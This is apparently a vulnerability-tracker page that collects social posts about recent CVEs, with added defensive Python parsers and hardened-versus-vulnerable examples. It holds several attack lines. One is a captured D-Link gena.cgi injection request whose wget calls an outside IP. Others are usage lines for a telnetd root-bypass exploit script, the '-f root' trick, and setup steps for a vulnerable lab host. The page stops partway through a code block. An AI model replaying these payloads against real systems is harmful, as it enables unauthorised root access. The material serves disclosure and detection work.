Overview

  • Microsoft
  • Microsoft Office 2019

26 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (7.8)
EPSS
Pending

Description

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

Statistics

  • 9 Posts
  • 75 Interactions

Last activity: Last hour

Fediverse

Microsoft releases emergency patch for an Office zero-day

msrc.microsoft.com/update-guid

  • 36
  • 34
  • 0
  • 12h ago
‼️ CVE-2026-21509: Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally

▪️Zero Day: Yes; Actively exploited
▪️CVSS: 7.8
▪️CVE Published: Today, January 26th, 2026

Advisory: msrc.microsoft.com/update-guid

Affected Products:

▪️Microsoft Office 2016 (64-bit edition)
▪️Microsoft Office 2016 (32-bit edition)
▪️Microsoft Office LTSC 2024 for 64-bit editions
▪️Microsoft Office LTSC 2024 for 32-bit editions
▪️Microsoft Office LTSC 2021 for 32-bit editions
▪️Microsoft Office LTSC 2021 for 64-bit editions
▪️Microsoft 365 Apps for Enterprise for 64-bit Systems
▪️Microsoft 365 Apps for Enterprise for 32-bit Systems
▪️Microsoft Office 2019 for 64-bit editions
▪️Microsoft Office 2019 for 32-bit editions

  • 1
  • 1
  • 0
  • 12h ago
🟠 CVE-2026-21509 - High (7.8)

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 1
  • 0
  • 0
  • 12h ago
There is an exploited 0-day vulnerability, CVE-2026-21509, in practically all Microsoft #Office versions. From Office 2021 onward Microsoft is patching server-side. A patch is available for Office 2016; Office 2019 is still open.

borncity.com/blog/2026/01/27/m

  • 1
  • 0
  • 1
  • 6h ago
Microsoft released CVE-2026-21509 today for an Office Security Feature Bypass Vulnerability. Microsoft has indicated this CVE is being actively exploited and is publicly disclosed.

Update: Patches for Office 2016 and 2019 are apparently now available.

“Office 2021 and later will be automatically protected via a service-side change, but will be required to restart their Office applications for this to take effect.”

msrc.microsoft.com/update-guid

#ThreatIntel

  • 0
  • 0
  • 0
  • 7h ago
‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

  • 0
  • 1
  • 0
  • 6h ago

Bluesky

Microsoft patches actively exploited Office zero-day vulnerability (CVE-2026-21509) #patchmanagement
  • 0
  • 0
  • 0
  • Last hour
CISA has added five new actively exploited vulnerabilities to its KEV catalog, urging organizations to prioritize remediation. - IOCs: CVE-2018-14634, CVE-2025-52691, CVE-2026-21509 - #CISA #KEV #ThreatIntel #Vulnerability
  • 0
  • 0
  • 0
  • 2h ago

Overview

  • GNU
  • Inetutils

21 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
0.49%

Description

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.
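The description above is the whole bug in one line: the client-supplied USER value travels in the telnet NEW-ENVIRON subnegotiation and ends up on the command line of login(1), where "-f" means "already authenticated". The following is an added example, not inetutils or SafeBreach code: it decodes a NEW-ENVIRON block (RFC 1572 framing, constructed sample bytes), flags values that would be parsed as options, and contrasts an illustrative vulnerable argv construction (a command string split on whitespace) with a hardened one. How the real telnetd assembles its login command line is covered in the SafeBreach writeup linked further down; the `login_argv` shape here is an assumption used to show the pattern.

```python
# Added example (not inetutils or SafeBreach code): decode the telnet
# NEW-ENVIRON subnegotiation a client uses to send USER, flag values that
# would be parsed as options, and contrast a vulnerable argv build with a
# hardened one. All sample bytes are constructed.
import shlex

IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 39                              # telnet option code (RFC 1572)
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2          # subnegotiation commands
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3


def parse_new_environ(data: bytes) -> dict:
    """Return {name: value} from one 'IAC SB NEW-ENVIRON IS|INFO ... IAC SE'
    block sent by the client. ESC-escaped bytes and doubled IACs are
    unescaped; a conforming peer escapes VAR/VALUE/ESC inside data."""
    if data[:3] != bytes([IAC, SB, NEW_ENVIRON]) or data[-2:] != bytes([IAC, SE]):
        raise ValueError("not a NEW-ENVIRON subnegotiation")
    body = data[3:-2].replace(bytes([IAC, IAC]), bytes([IAC]))
    if not body or body[0] not in (ENV_IS, ENV_INFO):
        raise ValueError("client-to-server block must start with IS or INFO")
    env, name, value = {}, None, None
    i = 1
    while i < len(body):
        b = body[i]
        if b in (ENV_VAR, ENV_USERVAR):       # start of a new variable name
            if name is not None:
                env[name.decode("latin-1")] = (value or b"").decode("latin-1")
            name, value = bytearray(), None
        elif b == ENV_VALUE and name is not None and value is None:
            value = bytearray()               # switch from name bytes to value bytes
        else:
            if b == ENV_ESC and i + 1 < len(body):
                i += 1                        # next byte is literal data
                b = body[i]
            if name is None:
                raise ValueError("data before first VAR")
            (value if value is not None else name).append(b)
        i += 1
    if name is not None:
        env[name.decode("latin-1")] = (value or b"").decode("latin-1")
    return env


def flag_argument_injection(env: dict) -> list:
    """Names whose value would change a command line built from it: a
    leading '-' (parsed as an option) or whitespace (extra argv words)."""
    suspicious = []
    for name, value in env.items():
        stripped = value.strip()
        if stripped.startswith("-") or len(stripped.split()) > 1:
            suspicious.append(name)
    return suspicious


def login_argv(user: str, hardened: bool) -> list:
    """Illustrative only (assumed shape, not inetutils' code). The vulnerable
    form builds a command string and splits it on whitespace, so USER='-f root'
    becomes login's own '-f root' (pre-authenticated root). The hardened form
    rejects option-like names and ends option parsing with '--'."""
    if not hardened:
        return shlex.split(f"/bin/login -p {user}")
    if not user or user[0] == "-" or any(c.isspace() for c in user):
        raise ValueError("refusing option-like or multi-word USER")
    return ["/bin/login", "-p", "--", user]


def hardened_rejects(user: str) -> bool:
    try:
        login_argv(user, hardened=True)
        return False
    except ValueError:
        return True


# Constructed samples: the exploit shape from the CVE text and a benign login.
SAMPLE_ATTACK = (bytes([IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR]) + b"USER"
                 + bytes([ENV_VALUE]) + b"-f root" + bytes([IAC, SE]))
SAMPLE_BENIGN = (bytes([IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR]) + b"USER"
                 + bytes([ENV_VALUE]) + b"alice" + bytes([ENV_USERVAR]) + b"DISPLAY"
                 + bytes([ENV_VALUE]) + b"host:0" + bytes([IAC, SE]))

if __name__ == "__main__":
    for sample in (SAMPLE_ATTACK, SAMPLE_BENIGN):
        env = parse_new_environ(sample)
        print(env, "-> suspicious:", flag_argument_injection(env))
```

The parser is the piece a checker or IDS rule needs: it is the same decoding telnetd performs, so matching on `USER` values that start with a dash catches the published exploit shape without relying on any specific exploit script. Note that the hardened builder rejects the name before it reaches argv; relying on `--` alone still leaves login's own parsing of odd usernames to deal with.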

Statistics

  • 12 Posts
  • 23 Interactions

Last activity: 3 hours ago

Fediverse

The telnetd vuln has a CVE now - CVE-2026-24061

Proof of concept: github.com/SafeBreach-Labs/CVE

  • 6
  • 11
  • 0
  • 19h ago
Any good, legitimate checker around for CVE-2026-24061 ?

Exploitation is trivial, checking for the vulnerability, not so much.

  • 1
  • 1
  • 0
  • 12h ago
‼️CVE-2026-24061: Telnet RCE Exploit

GitHub: github.com/SafeBreach-Labs/CVE

This script exploits the CVE-2026-24061 vulnerability in Telnet servers using a malformed USER environment variable.

CVSS: 9.8

Usage:

```
python telnet_rce.py <host> [-p <port>]
```

Arguments:

host: Target IP address or hostname (required)
-p, --port: Target port (default: 23)

Example:

```
python telnet_rce.py 192.168.1.100
python telnet_rce.py example.com -p 23
```

Writeup: safebreach.com/blog/safebreach

  • 0
  • 2
  • 0
  • 6h ago
Exploitation is completely trivial...

  • 0
  • 1
  • 0
  • 13h ago
New PoC Exploit released for telnetd CVE by SafeBreach Labs

Happy Monday. You may want to keep an eye on CVE-2026-24061 which is a critical telnetd authentication bypass flaw that attackers are actively exploiting to gain root access: New research from SafeBreach Labs deepens the story with the first full root cause analysis and proof-of-concept exploit that explains exactly how this vulnerability works—and why it’s highly dangerous and easy to exploit.  The…

itnerd.blog/2026/01/26/new-poc

  • 0
  • 0
  • 1
  • 17h ago
Here I am installing on Debian in the laboratory... To test CVE-2026-24061.

  • 0
  • 0
  • 0
  • 13h ago
```shell
# Bring up a Debian 12 (bookworm) VM and install the unpatched inetutils telnetd
vagrant init debian/bookworm64
vagrant up
vagrant ssh

sudo bash
apt update
apt install inetutils-telnetd=2:2.4-2+deb12u1 inetutils-telnet=2:2.4-2+deb12u1
# 1. Edit /etc/inetd.conf to enable telnetd
# 2. Restart the superserver so it picks up the change
systemctl restart inetutils-inetd
# 3. Check telnetd is listening
ss -tupln | grep :23
```

Congratulations, you got yourself a system vulnerable to CVE-2026-24061 !

  • 0
  • 0
  • 0
  • 13h ago
I've successfully tested the PoC in the Labs GitHub repository. It seems like a good place to start to write a checker (if there isn't a good one).

github.com/SafeBreach-Labs/CVE

  • 0
  • 0
  • 0
  • 12h ago
11 years of “trust me, bro” baked into every telnet packet.

Type -f root, hit enter, become god.

The ’90s called—they want their shell back.
securityaffairs.com/187255/sec

  • 0
  • 0
  • 0
  • 3h ago
‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

  • 0
  • 1
  • 0
  • 6h ago

Bluesky

We have been tweaking the scan the last few days to better weed out non-telnet protocols. Some honeypots may remain. Telnet should not be publicly exposed, but often is especially on legacy iot devices. CVE-2026-24061 info & patch: seclists.org/oss-sec/2026...
  • 0
  • 0
  • 0
  • 20h ago

Overview

  • VMware vCenter Server

18 Jun 2024
Published
24 Jan 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
82.70%

Description

vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

Statistics

  • 6 Posts
  • 1 Interaction

Last activity: 3 hours ago

Fediverse

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has identified a critical VMware vCenter Server vulnerability (CVE-2024-37079) as being actively exploited, mandating federal agencies to patch their systems within three weeks. This heap overflow vulnerability allows for remote code execution with low complexity and no required privileges or user interaction, and Broadcom advises immediate patching as no workarounds exist.
bleepingcomputer.com/news/secu

  • 0
  • 0
  • 0
  • 18h ago
As it is public now* I'm able to talk about it.

Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.

> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.

euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi

support.broadcom.com/web/ecx/s

#infosec #itsec #itsecurity

* technically since Friday.

  • 0
  • 0
  • 0
  • 21h ago

Bluesky

CISA added VMware vCenter vulnerability CVE-2024-37079 to its KEV list after confirmed in-the-wild exploitation, urging organizations to apply patches
  • 0
  • 1
  • 0
  • 15h ago
🛑 VMware vCenter: CVE-2024-37079 is being actively exploited according to CISA 👇 All the details here - www.it-connect.fr/vmware-vcent... #vmware #infosec #cybersecurite
  • 0
  • 0
  • 0
  • 18h ago
CISA warns of actively exploited critical VMware vCenter Server RCE flaw (CVE-2024-37079). Federal agencies must patch by Feb 13. No workarounds available. #Cybersecurity #News
  • 0
  • 0
  • 0
  • 3h ago

Overview

  • Meta
  • react-server-dom-webpack

26 Jan 2026
Published
26 Jan 2026
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack. The vulnerabilities are triggered by sending specially crafted HTTP requests to Server Function endpoints, and could lead to server crashes, out-of-memory exceptions or excessive CPU usage; depending on the vulnerable code path being exercised, the application configuration and application code. Strongly consider upgrading to the latest package versions to reduce risk and prevent availability issues in applications using React Server Components.

Statistics

  • 4 Posts
  • 17 Interactions

Last activity: 8 hours ago

Fediverse

New React.js patches released today for CVE-2026-23864. Fixes for DoS issues reported by several people, including Yours Truly 🙂

The blog post at react.dev/blog/2025/12/11/deni has been updated with the new info.

  • 0
  • 0
  • 0
  • 10h ago
🟠 CVE-2026-23864 - High (7.5)

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack.

The vulnerabilities are triggered by sending specially c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

  • 0
  • 0
  • 0
  • 8h ago

Bluesky

New @react.dev patches released today for CVE-2026-23864. Fixes for DoS issues reported by several people, including Yours Truly 🙂 The blog post at react.dev/blog/2025/12... has been updated with the new info.
  • 4
  • 12
  • 0
  • 10h ago
Summary of CVE-2026-23864 | Vercel News
  • 0
  • 1
  • 0
  • 10h ago

Overview

  • Pending

30 Dec 2019
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
93.30%

Description

The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network.

Statistics

  • 2 Posts
  • 3 Interactions

Last activity: 11 hours ago

Fediverse

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

```http
SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0
```

  • 1
  • 2
  • 0
  • 17h ago
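The honeypot capture above shows the injection exactly as it arrives: shell metacharacters inside the `service=` query parameter of a UPnP SUBSCRIBE to `/gena.cgi`. The following is an added detection example, not the poster's honeypot code: it parses the request line, decodes the query (including percent-encoded variants that a naive string match would miss), flags parameters carrying shell metacharacters, and pulls out the stager URL for blocklisting. The first sample request is copied from the post; the percent-encoded and benign requests are constructed, and the `/x` path in the encoded sample is a placeholder.

```python
# Added example (not the honeypot operator's code): flag CVE-2019-17621-style
# command injection in UPnP SUBSCRIBE requests and extract payload URLs.
import re
from urllib.parse import unquote

# Backticks, command separators and $( ) inside a UPnP service name are never legitimate.
SHELL_META = re.compile(r"[`;|&]|\$\(")
URL_RE = re.compile(r"https?://[^\s`'\";<>]+")


def split_request_line(line: str):
    """'METHOD target HTTP/x.y' -> (method, target, version). The target may
    contain raw spaces in these attacks, so split on the last ' HTTP/'."""
    method, rest = line.split(" ", 1)
    target, version = rest.rsplit(" HTTP/", 1)
    return method, target, "HTTP/" + version


def parse_query(target: str):
    """Split path and query without urllib.parse.parse_qsl, which on older
    Pythons also splits on ';' and would fragment the injected command."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)   # decode %60 etc. before matching
    return path, params


def inspect_subscribe(raw: str):
    """Return a finding dict for a gena.cgi injection attempt, else None."""
    request_line = raw.split("\r\n", 1)[0].split("\n", 1)[0]
    try:
        method, target, _ = split_request_line(request_line)
    except ValueError:
        return None                                # not an HTTP request line
    path, params = parse_query(target)
    if method != "SUBSCRIBE" or not path.endswith("/gena.cgi"):
        return None
    for name, value in params.items():
        if SHELL_META.search(value):
            return {"param": name, "injected": value,
                    "payload_urls": URL_RE.findall(value)}
    return None


# Constructed samples. ATTACK reproduces the request shape shown in the post above.
ATTACK = ("SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/"
          "81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1\r\n"
          "Host: x.x.x.x\r\nCallback: <http://192.168.0.2:1337/ServiceProxy0>\r\n"
          "Connection: close\r\nNt: upnp:event\r\nTimeout: Second-1800\r\n\r\n")
ENCODED = ("SUBSCRIBE /gena.cgi?service=%60wget%20http://185.93.89.75/x%20-O%20/dev/null%60"
           " HTTP/1.1\r\nHost: x.x.x.x\r\n\r\n")          # same payload, percent-encoded
BENIGN = "SUBSCRIBE /gena.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"

if __name__ == "__main__":
    for sample in (ATTACK, ENCODED, BENIGN):
        print(inspect_subscribe(sample))
```

Matching after percent-decoding matters: the backtick in the raw request arrives as `%60` from some scanners, and a rule written against the literal backtick misses it. Run over a honeypot or reverse-proxy access log, the `payload_urls` field gives the stager hosts to block and to feed back into the indicators listed in the replies.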
@heinen we get SUBSCRIBE's in from generic D-Link / TRENDnet gena.cgi Buffer Overflow Attempts all the time

```
${SENSOR_IP}/gena.cgi?service=`echo ; wget http://185.93.89.75/81_DI0EI0A0CDC_CVE-2019-17621 -O /dev/null; echo >`
```

Most of the hits from: 192.159.99.95
Alot from: 185.93.89.75
Tiny amt from: 146.70.117.104

May need to see if @iagox86 thinks if that CVE fits too for this.

  • 0
  • 0
  • 0
  • 11h ago

Overview

  • Cisco
  • Cisco Unified Communications Manager

21 Jan 2026
Published
22 Jan 2026
Updated

CVSS v3.1
HIGH (8.2)
EPSS
0.68%

Description

A vulnerability in Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to improper validation of user-supplied input in HTTP requests. An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root.

Statistics

  • 2 Posts

Last activity: 13 hours ago

Bluesky

Cisco has confirmed the exploitation of a new Zero-Day vulnerability, CVE-2026-20045, in their HTTP web services. This flaw allows attackers to crash devices or execute code. CISA has added it to the Known Exploited Vulnerabilities catalog, urging patches by Feb 11.
  • 0
  • 0
  • 0
  • 14h ago
Cisco fixes the actively exploited zero-day vulnerability in Unified CM and Webex. The vulnerability, CVE-2026-20045 (CVSS: 8.2), could allow an unauthenticated remote attacker to execute arbitrary commands on the operating system. #ciberseguridad www.linkedin.com/pulse/cisco-...
  • 0
  • 0
  • 0
  • 13h ago

Overview

  • SmarterTools
  • SmarterMail

22 Jan 2026
Published
27 Jan 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
3.36%

Description

SmarterTools SmarterMail versions prior to build 9511 contain an authentication bypass vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. An unauthenticated attacker can supply a target administrator username and a new password to reset the account, resulting in full administrative compromise of the SmarterMail instance. NOTE: SmarterMail system administrator privileges grant the ability to execute operating system commands via built-in management functionality, effectively providing administrative (SYSTEM or root) access on the underlying host.
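The description above names the two checks the endpoint skipped: it neither verified the existing password nor required a reset token before changing an administrator's password. The following is an added example, not SmarterMail code: a minimal in-memory admin store with the vulnerable handler beside a hardened one that accepts a reset only with the current password or a single-use, time-limited token bound to that username. Request field names (`username`, `newPassword`, `currentPassword`, `resetToken`) are assumptions chosen for the illustration.

```python
# Added example (not SmarterMail code): the missing checks behind an
# anonymous force-reset-password endpoint, vulnerable and hardened.
import hashlib
import hmac
import secrets
import time

PBKDF2_ROUNDS = 100_000


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class AdminStore:
    """In-memory stand-in for the application's user and token tables."""

    def __init__(self):
        self.users = {}    # name -> (salt, password hash)
        self.tokens = {}   # reset token -> (bound username, expiry epoch)

    def set_password(self, name: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.users[name] = (salt, _hash(password, salt))

    def verify(self, name: str, password: str) -> bool:
        rec = self.users.get(name)
        if rec is None:
            _hash(password, b"\0" * 16)          # same cost for unknown users
            return False
        return hmac.compare_digest(_hash(password, rec[0]), rec[1])

    def issue_reset_token(self, name: str, ttl: int = 900, now=None) -> str:
        token = secrets.token_urlsafe(32)
        self.tokens[token] = (name, (now or time.time()) + ttl)
        return token


def force_reset_vulnerable(store: AdminStore, body: dict) -> int:
    """Anonymous caller, no proof of anything: whoever names an admin sets
    that admin's password. This is the shape the CVE text describes."""
    store.set_password(body["username"], body["newPassword"])
    return 200


def force_reset_hardened(store: AdminStore, body: dict, now=None) -> int:
    """Accept only (a) the account's current password or (b) an unexpired,
    single-use token issued for exactly this username. All failures return
    the same status so the endpoint does not enumerate admin names."""
    now = now or time.time()
    name, new_password = body.get("username"), body.get("newPassword")
    if not name or not new_password or name not in store.users:
        return 403
    if "currentPassword" in body:
        ok = store.verify(name, body["currentPassword"])
    elif "resetToken" in body:
        rec = store.tokens.pop(body["resetToken"], None)   # consume: single use
        ok = rec is not None and rec[0] == name and rec[1] > now
    else:
        ok = False
    if not ok:
        return 403
    store.set_password(name, new_password)
    return 200


if __name__ == "__main__":
    store = AdminStore()
    store.set_password("admin", "correct horse")
    print("vulnerable:", force_reset_vulnerable(store, {"username": "admin", "newPassword": "pwned"}))
    print("hardened, no proof:", force_reset_hardened(store, {"username": "admin", "newPassword": "pwned"}))
```

The token branch is where implementations usually go wrong even after "adding a token": the token must be bound to the username it was issued for, expire, and be consumed on first use, otherwise a token minted for a low-value account resets the system administrator.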

Statistics

  • 2 Posts
  • 3 Interactions

Last activity: 6 hours ago

Fediverse

‼️CISA has added 5 vulnerabilities to the KEV Catalog

darkwebinformer.com/cisa-kev-c

CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability

CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability

CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability

CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability

CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability

  • 0
  • 1
  • 0
  • 6h ago

Bluesky

We added SmarterTools SmarterMail CVE-2026-23760 RCE to our daily Vulnerable HTTP scans. Around 6000 IPs globally found likely vulnerable based on our version check. We also see exploitation attempts in the wild. CVE-2026-23760 Geo Treemap View: dashboard.shadowserver.org/statistics/c...
  • 1
  • 1
  • 0
  • 16h ago

Overview

  • MongoDB Inc.
  • MongoDB Server

19 Dec 2025
Published
12 Jan 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
51.95%

Description

Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 prior to 7.0.28 versions, MongoDB Server v8.0 versions prior to 8.0.17, MongoDB Server v8.2 versions prior to 8.2.3, MongoDB Server v6.0 versions prior to 6.0.27, MongoDB Server v5.0 versions prior to 5.0.32, MongoDB Server v4.4 versions prior to 4.4.30, MongoDB Server v4.2 versions greater than or equal to 4.2.0, MongoDB Server v4.0 versions greater than or equal to 4.0.0, and MongoDB Server v3.6 versions greater than or equal to 3.6.0.
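"Mismatched length fields" in a compressed wire header is a well-defined bug pattern: the receiver sizes its output buffer from the header's declared uncompressed size, the stream inflates to fewer bytes, and the untouched tail of the buffer (whatever the allocator handed back) is treated as message data. The following is an added example, not MongoDB's code: it frames a zlib OP_COMPRESSED message using the public wire format (MsgHeader, originalOpcode, uncompressedSize, compressorId), simulates a non-zeroing allocator, and shows a trusting decoder returning stale bytes beside a decoder that insists the stream inflate to exactly the declared length. The 48 MB ceiling is assumed to match the server's documented maximum message size; the stale heap contents are constructed.

```python
# Added example (not MongoDB code): why a declared uncompressedSize must be
# checked against the bytes zlib actually produces.
import struct
import zlib

OP_MSG, OP_COMPRESSED = 2013, 2012
COMPRESSOR_ZLIB = 2
MAX_MESSAGE = 48 * 1024 * 1024      # assumed: MongoDB's 48 MB max message size


def build_op_compressed(payload: bytes, declared_size: int, request_id: int = 1) -> bytes:
    """MsgHeader + originalOpcode + uncompressedSize + compressorId + zlib data.
    declared_size is attacker-controlled and need not match len(payload)."""
    body = struct.pack("<iiB", OP_MSG, declared_size, COMPRESSOR_ZLIB) + zlib.compress(payload)
    header = struct.pack("<iiii", 16 + len(body), request_id, 0, OP_COMPRESSED)
    return header + body


def parse_op_compressed(frame: bytes):
    msg_len, _req, _resp, op = struct.unpack_from("<iiii", frame, 0)
    if msg_len != len(frame) or op != OP_COMPRESSED:
        raise ValueError("bad MsgHeader")
    orig_op, declared, compressor = struct.unpack_from("<iiB", frame, 16)
    if compressor != COMPRESSOR_ZLIB:
        raise ValueError("only zlib handled here")
    return orig_op, declared, frame[25:]


class StaleHeap:
    """Stand-in for malloc(): buffers come back still holding bytes of
    whatever was freed earlier (here, a previous client's session data)."""

    def __init__(self, leftover: bytes):
        self.pool = bytes(leftover)

    def alloc(self, n: int) -> bytearray:
        return bytearray(self.pool[:n].ljust(n, b"\0"))


def inflate_vulnerable(frame: bytes, heap: StaleHeap) -> bytes:
    """Sizes the output from the header, writes only what zlib produced, and
    hands the whole buffer on: the tail is uninitialized memory."""
    _op, declared, blob = parse_op_compressed(frame)
    out = heap.alloc(declared)
    data = zlib.decompress(blob)
    out[:len(data)] = data
    return bytes(out)


def inflate_hardened(frame: bytes) -> bytes:
    """Bounds the declared size, caps zlib output at it, and rejects any
    stream that ends early, ends late, or leaves input unconsumed."""
    _op, declared, blob = parse_op_compressed(frame)
    if not 0 < declared <= MAX_MESSAGE:
        raise ValueError("uncompressedSize out of range")
    d = zlib.decompressobj()
    data = d.decompress(blob, declared)          # never inflate past the declared size
    if not d.eof or d.unconsumed_tail or len(data) != declared:
        raise ValueError(f"declared {declared} bytes, stream inflates differently")
    return data


def hardened_rejects(frame: bytes) -> bool:
    try:
        inflate_hardened(frame)
        return False
    except ValueError:
        return True


# Constructed stale heap contents and a small command payload.
STALE = b"secret-session-token-from-previous-client"
PAYLOAD = b'{"ping":1}'


def demo_leak() -> bytes:
    """Declare 24 bytes more than the payload inflates to."""
    frame = build_op_compressed(PAYLOAD, declared_size=len(PAYLOAD) + 24)
    return inflate_vulnerable(frame, StaleHeap(STALE))


if __name__ == "__main__":
    print(demo_leak())
    frame = build_op_compressed(PAYLOAD, declared_size=len(PAYLOAD) + 24)
    print("hardened rejects oversize declaration:", hardened_rejects(frame))
```

The check is cheap and has three parts: an absolute bound on the declared size (so a 2 GB claim cannot drive allocation), `max_length` on the decompressor so a small compressed blob cannot expand beyond what was promised, and an `eof` test so a stream that inflates to fewer bytes than declared is refused rather than padded with heap contents.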

Statistics

  • 1 Post
  • 4 Interactions

Last activity: 13 hours ago

Fediverse

🚨A new video on MongoBleed is online🚨
(CVE-2025-14847), a recent vulnerability that is already being actively exploited.

It is not a classic remote code execution, but the risk is anything but theoretical.

In the video I explain why this vulnerability deserves attention, what can happen in real-world scenarios, and why ignoring it is a mistake.

youtu.be/8DEcMrY8kpA

#sicurezza #mongodb
@sicurezza

  • 1
  • 3
  • 0
  • 13h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post

Last activity: 13 hours ago

Bluesky

Critical HarfBuzz Vulnerability Analysis - SUSE-2026-0287-1 The recent patch for HarfBuzz (CVE-2025-53086) addresses a classic yet dangerous heap corruption bug. Read more: 👉 tinyurl.com/48jsydbr #OpenSUSE #Security
  • 0
  • 0
  • 0
  • 13h ago

Overview

  • Kludex
  • python-multipart

27 Jan 2026
Published
27 Jan 2026
Updated

CVSS v3.1
HIGH (8.6)
EPSS
Pending

KEV

Description

Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename. Users should upgrade to version 0.0.22 to receive a patch or, as a workaround, avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.
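The description pins the bug to one configuration: with `UPLOAD_DIR` set and `UPLOAD_KEEP_FILENAME=True`, the client-supplied filename is joined onto the upload directory, so a name such as `../../etc/cron.d/x` lands outside it. The following is an added example, not python-multipart's code or its 0.0.22 patch: the vulnerable join beside a hardened path resolver that drops any directory component (either separator), rejects empty, dot, and NUL names, and confirms with `realpath` and `commonpath` that the final target stays inside the upload directory. The demo writes only into a fresh temporary directory.

```python
# Added example (not python-multipart's code): path traversal through a kept
# upload filename, and a resolver that confines writes to the upload dir.
import os
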